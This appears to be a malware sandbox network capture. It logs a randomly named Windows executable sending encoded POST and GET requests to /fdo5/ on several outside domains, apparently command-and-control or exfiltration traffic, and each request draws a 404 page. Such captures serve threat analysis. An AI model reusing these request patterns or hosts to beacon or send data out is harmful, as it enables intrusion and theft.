                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are loo
Dec 3, 2023 16:26:33.548136950 CET | 193 | IN
                                                                                              Data Ascii: king for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49747 | 109.68.33.25 | 80 | 2492 | C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2023 16:26:36.063855886 CET | 10835 | OUT | POST /fdo5/ HTTP/1.1
                                                                                              Host: www.fdissolutions.net
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.fdissolutions.net
                                                                                              Referer: http://www.fdissolutions.net/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 10287
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Dec 3, 2023 16:26:36.247498035 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                                              content-type: text/html
                                                                                              server: Microsoft-IIS/10.0
                                                                                              x-powered-by: ASP.NET
                                                                                              date: Sun, 03 Dec 2023 15:26:35 GMT
                                                                                              content-length: 1245
                                                                                              connection: close
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are loo
Dec 3, 2023 16:26:36.247513056 CET | 193 | IN
                                                                                              Data Ascii: king for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49748 | 109.68.33.25 | 80 | 2492 | C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2023 16:26:38.894529104 CET | 464 | OUT | GET /fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=inoojyPYY1WC9wcQL3KibnMAdvhtstHROTevXGeSx6okq+Nf2nPGtK9KaHajuwb+0LfF1HdY3MAFMtPUKPMp3iU3/gDoogh+Wg== HTTP/1.1
                                                                                              Host: www.fdissolutions.net
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Dec 3, 2023 16:26:39.164745092 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                                              content-type: text/html
                                                                                              server: Microsoft-IIS/10.0
                                                                                              x-powered-by: ASP.NET
                                                                                              date: Sun, 03 Dec 2023 15:26:38 GMT
                                                                                              content-length: 1245
                                                                                              connection: close
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are loo
Dec 3, 2023 16:26:39.164772987 CET | 193 | IN
                                                                                              Data Ascii: king for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49749 | 66.29.155.54 | 80 | 2492 | C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2023 16:26:44.735837936 CET | 721 | OUT | POST /fdo5/ HTTP/1.1
                                                                                              Host: www.pay4dance.xyz
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.pay4dance.xyz
                                                                                              Referer: http://www.pay4dance.xyz/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 187
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Ascii: 540H2x=0R1RIBfWj/5RT5u/54Ki9k8+p1Y92muJ9vEEJPpdDPZlBx7yX3mypoK3KLqaoXunKOAo3og6YpC6I+T03/MpljQOWqbqip6it5hNafuDqYZXqra8S2EJ21DOPSSfojvnsJxwxggv41/Hn+qWRAF13cXaFvr5WNKL1pwr0CMXdlZ53YOWmg==
Dec 3, 2023 16:26:45.033732891 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                                              Date: Sun, 03 Dec 2023 15:26:44 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 5278
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-
Dec 3, 2023 16:26:45.033751965 CET | 1340 | IN
                                                                                              Data Ascii: 12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5 9.86 10.67 13.
Dec 3, 2023 16:26:45.033763885 CET | 1340 | IN
                                                                                              Data Ascii: 5 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"/> </g></svg
Dec 3, 2023 16:26:45.033777952 CET | 1340 | IN
                                                                                              Data Ascii: 3.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.07 9.3-10.76 15.
Dec 3, 2023 16:26:45.033993959 CET | 333 | IN
                                                                                              Data Ascii: s="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs></svg><h2>P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49750 | 66.29.155.54 | 80 | 2492 | C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2023 16:26:47.421148062 CET | 741 | OUT | POST /fdo5/ HTTP/1.1
                                                                                              Host: www.pay4dance.xyz
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.pay4dance.xyz
                                                                                              Referer: http://www.pay4dance.xyz/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 207
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Ascii: 540H2x=0R1RIBfWj/5RSZe/+f+i/E85wFY9gWuN9v4EJKZNC89lBRLyFzyyuoK3Crqfl3uuKO8g3pM6YpG6I8b03MUqnzQMeKbkvJ6it5hNaf69qYBXq4C8ASQG11DBbCSflDv7sJxoxlF442HHn8CWRSt65cXDBvqZQe3Sw6RzyC4IDBNn2NiFhbkMQewiIEAZaYGlmBO9HrY=
Dec 3, 2023 16:26:47.689701080 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                                              Date: Sun, 03 Dec 2023 15:26:47 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 5278
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-
Dec 3, 2023 16:26:47.689726114 CET | 1340 | IN
                                                                                              Data Ascii: 12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5 9.86 10.67 13.
Dec 3, 2023 16:26:47.689738035 CET | 1340 | IN
                                                                                              Data Ascii: 5 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"/> </g></svg
Dec 3, 2023 16:26:47.689752102 CET | 1340 | IN
                                                                                              Data Ascii: 3.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.07 9.3-10.76 15.
Dec 3, 2023 16:26:47.690017939 CET | 333 | IN
                                                                                              Data Ascii: s="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs></svg><h2>P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49751 | 66.29.155.54 | 80 | 2492 | C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2023 16:26:50.107712030 CET | 10823 | OUT | POST /fdo5/ HTTP/1.1
                                                                                              Host: www.pay4dance.xyz
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.pay4dance.xyz
                                                                                              Referer: http://www.pay4dance.xyz/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 10287
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Dec 3, 2023 16:26:50.387907982 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                                              Date: Sun, 03 Dec 2023 15:26:50 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 5278
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-
                                                                                              Dec 3, 2023 16:26:50.387933016 CET | 1340 | IN
                                                                                              Data Ascii: 12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5 9.86 10.67 13.
                                                                                              Dec 3, 2023 16:26:50.387953997 CET | 1340 | IN
                                                                                              Data Ascii: 5 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"/> </g></svg
                                                                                              Dec 3, 2023 16:26:50.387972116 CET | 1340 | IN
                                                                                              Data Ascii: 3.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.07 9.3-10.76 15.
                                                                                              Dec 3, 2023 16:26:50.388072968 CET | 333 | IN
                                                                                              Data Ascii: s="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs></svg><h2>P


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              12 | 192.168.2.4 | 49752 | 66.29.155.54 | 80 | 2492 | C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              Dec 3, 2023 16:26:52.795949936 CET | 460 | OUT | GET /fdo5/?540H2x=5TdxL1jawfl3Ka3qvJ6r7WEnhl9d9FSMp+F3J8Z8WOIoZyaqSH32l6+4J8Kvi3fjVro4t5UeAoiyMZT16OgV/jIcRYbasIDnmQ==&fXUX=ShJ8DFcXvtj84pw HTTP/1.1
                                                                                              Host: www.pay4dance.xyz
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Dec 3, 2023 16:26:53.129287004 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                                              Date: Sun, 03 Dec 2023 15:26:52 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 5278
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-
                                                                                              Dec 3, 2023 16:26:53.129312992 CET | 1340 | IN
                                                                                              Data Ascii: 23.58v-33.13c0-12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5
                                                                                              Dec 3, 2023 16:26:53.129327059 CET | 1340 | IN
                                                                                              Data Ascii: 9 2.03 1.32 3.75 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"
                                                                                              Dec 3, 2023 16:26:53.129342079 CET | 1340 | IN
                                                                                              Data Ascii: 19 15.27 3.19 23.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.0
                                                                                              Dec 3, 2023 16:26:53.129359007 CET | 348 | IN
                                                                                              Data Ascii: ussianblur class="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              13 | 192.168.2.4 | 49753 | 52.68.224.126 | 80 | 2492 | C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              Dec 3, 2023 16:26:58.539813042 CET | 724 | OUT | POST /fdo5/ HTTP/1.1
                                                                                              Host: www.busan3-200.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.busan3-200.com
                                                                                              Referer: http://www.busan3-200.com/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 187
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Ascii: 540H2x=l7Yypln1j4ZRwM5ekjmdsK3byFtMp2G0QRgMlsPQFL6AB2PE+KM49HrsSGOUxcuI2cIXKQ3u7swmQyvUDzddxBCcVx9gH6b7BKBIWWoByyX5LByERF5RtzRGkpaqKV1B/doDTcsHbUqQCgvXiYH/vjRM/Sr7gEF6JUAFYDFDxAdTgEMMGA==
                                                                                              Dec 3, 2023 16:26:58.811713934 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                                              Cache-Control: private
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Server: Microsoft-IIS/8.5
                                                                                              X-Powered-By: ASP.NET
                                                                                              Date: Sun, 03 Dec 2023 15:26:58 GMT
                                                                                              Connection: close
                                                                                              Content-Length: 4857
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 8.5 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;co
                                                                                              Dec 3, 2023 16:26:58.811739922 CET | 1340 | IN
                                                                                              Data Ascii: lor:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;
                                                                                              Dec 3, 2023 16:26:58.811755896 CET | 1340 | IN
                                                                                              Data Ascii: ;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is
                                                                                              Dec 3, 2023 16:26:58.811773062 CET | 1271 | IN
                                                                                              Data Ascii: ;IIS Web Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x8007000


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              14 | 192.168.2.4 | 49754 | 52.68.224.126 | 80 | 2492 | C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              Dec 3, 2023 16:27:01.337733030 CET | 744 | OUT | POST /fdo5/ HTTP/1.1
                                                                                              Host: www.busan3-200.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.busan3-200.com
                                                                                              Referer: http://www.busan3-200.com/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 207
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
